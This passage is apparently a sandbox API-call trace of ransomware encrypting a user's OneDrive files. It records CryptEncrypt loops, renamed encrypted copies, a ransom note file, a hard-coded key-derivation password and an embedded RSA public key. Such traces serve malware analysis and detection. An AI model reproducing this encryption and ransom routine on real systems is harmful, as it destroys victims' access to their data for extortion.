hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.453] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.453] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.453] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.453] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.453] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.453] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.453] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.453] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.454] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.454] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.454] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.454] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.454] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.454] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.454] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.454] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.454] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.454] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.454] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.454] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.455] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.455] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.455] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.455] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.455] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.455] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.455] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.455] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.455] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.455] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.455] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.455] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.455] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.456] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.456] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.456] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.456] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.456] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.456] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.456] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.456] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.456] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.456] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.456] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.456] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.456] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.457] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.457] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.457] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.457] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.457] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.457] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.457] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.457] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.457] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.457] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.457] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.457] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.457] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.458] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.458] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.458] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x1c8, lpOverlapped=0x0) returned 1 [0282.458] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x1c8, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x1d0) returned 1 [0282.458] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x1d0, lpOverlapped=0x0) returned 1 [0282.458] CloseHandle (hObject=0x5d4c) returned 1 [0282.458] CloseHandle (hObject=0x5d80) returned 1 [0282.458] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nso-za\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nso-za\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0282.464] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0282.465] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nso-za\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0282.467] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nso-za\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nso-za\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0282.481] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0282.481] CryptDestroyKey (hKey=0x2fc4c8) returned 1 [0282.481] CryptReleaseContext (hProv=0x2f1e1a0, dwFlags=0x0) returned 1 [0282.481] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0282.481] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0282.481] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nso-za\\readme_back_files.htm")) returned 0xffffffff [0282.482] AreFileApisANSI () returned 1 [0282.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0282.482] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nso-za\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0282.483] GetFileType (hFile=0x5d3c) returned 0x1 [0282.483] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0282.485] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0282.485] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e200 | out: lpSystemTimeAsFileTime=0x2b9e200) [0282.485] GetLastError () returned 0x0 [0282.485] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\OneDriveLogo.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\onedrivelogo.png")) returned 0x20 [0282.488] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\OneDriveLogo.png", dwFileAttributes=0x80) returned 1 [0282.489] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\OneDriveLogo.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\onedrivelogo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0282.490] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\OneDriveLogo.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\onedrivelogo.png.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0282.496] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\OneDriveLogo.png.gsg", dwFileAttributes=0x2) returned 1 [0282.496] CryptAcquireContextA (in: phProv=0x2b9d1fc, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d1fc*=0x2f24b58) returned 1 [0282.498] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d200 | out: phHash=0x2b9d200) returned 1 [0282.498] lstrlenA (lpString="IobgRfrtGtwdLWqndRsiYwqNzMlQm") returned 29 [0282.498] CryptHashData (hHash=0x2fa4c8, pbData=0x28cb3c8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0282.498] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa4c8, dwFlags=0x1000000, phKey=0x2b9d1ec | out: phKey=0x2b9d1ec*=0x2fa748) returned 1 [0282.499] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d208, pcbBinary=0x2b9d1e8, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0282.499] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d208, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4 | out: pvStructInfo=0x2b9d1dc, pcbStructInfo=0x2b9d1e4) returned 1 [0282.504] CryptAcquireContextA (in: phProv=0x2b9d1f8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d1f8*=0x2f1eb30) returned 1 [0282.504] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1eb30, dwCertEncodingType=0x1, pInfo=0x2f39380*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f393b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f393b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d1f0 | out: phKey=0x2b9d1f0*=0x2fc348) returned 1 [0282.505] CryptEncrypt (in: hKey=0x2fc348, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d1e0*=0x80) returned 1 [0282.505] CryptEncrypt (in: hKey=0x2fc348, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1ed50*, pdwDataLen=0x2b9d1f4*=0x18, dwBufLen=0x80 | out: pbData=0x2f1ed50*, pdwDataLen=0x2b9d1f4*=0x80) returned 1 [0282.505] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f1ed50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x2f1ed50*, 